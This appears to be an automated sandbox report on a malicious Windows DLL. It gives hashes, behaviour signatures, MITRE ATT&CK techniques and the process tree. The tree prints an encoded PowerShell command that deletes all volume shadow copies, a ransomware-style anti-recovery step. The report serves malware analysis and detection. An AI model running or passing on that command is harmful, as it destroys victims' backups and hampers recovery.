Analysis

  • max time kernel
    90s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    15-06-2022 03:45

General

  • Target

    2afd8d5a9d39f59c6827acae7b915f3306bf2cf243ed19733e03af014e158542.dll

  • Size

    164KB

  • MD5

    b1bfced23e482fe588af810faf9dbe9e

  • SHA1

    e767d3573c0b463db710d5144f42c92faee8fbba

  • SHA256

    2afd8d5a9d39f59c6827acae7b915f3306bf2cf243ed19733e03af014e158542

  • SHA512

    40a73b63de0ed234bf92fd0b5824145493feabd7c2ea9b65bbca76578be540afe4e6b092e7b1804f442ba2b5d342ac85cc93f65b5b9b9f8f1380f5a87c171d99

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\2afd8d5a9d39f59c6827acae7b915f3306bf2cf243ed19733e03af014e158542.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\2afd8d5a9d39f59c6827acae7b915f3306bf2cf243ed19733e03af014e158542.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4640
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4092

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4516-130-0x0000000000000000-mapping.dmp
  • memory/4640-131-0x0000000000000000-mapping.dmp
  • memory/4640-132-0x000001E04F560000-0x000001E04F582000-memory.dmp
    Filesize

    136KB

  • memory/4640-133-0x00007FF823B40000-0x00007FF824601000-memory.dmp
    Filesize

    10.8MB

  • memory/4640-134-0x00007FF823B40000-0x00007FF824601000-memory.dmp
    Filesize

    10.8MB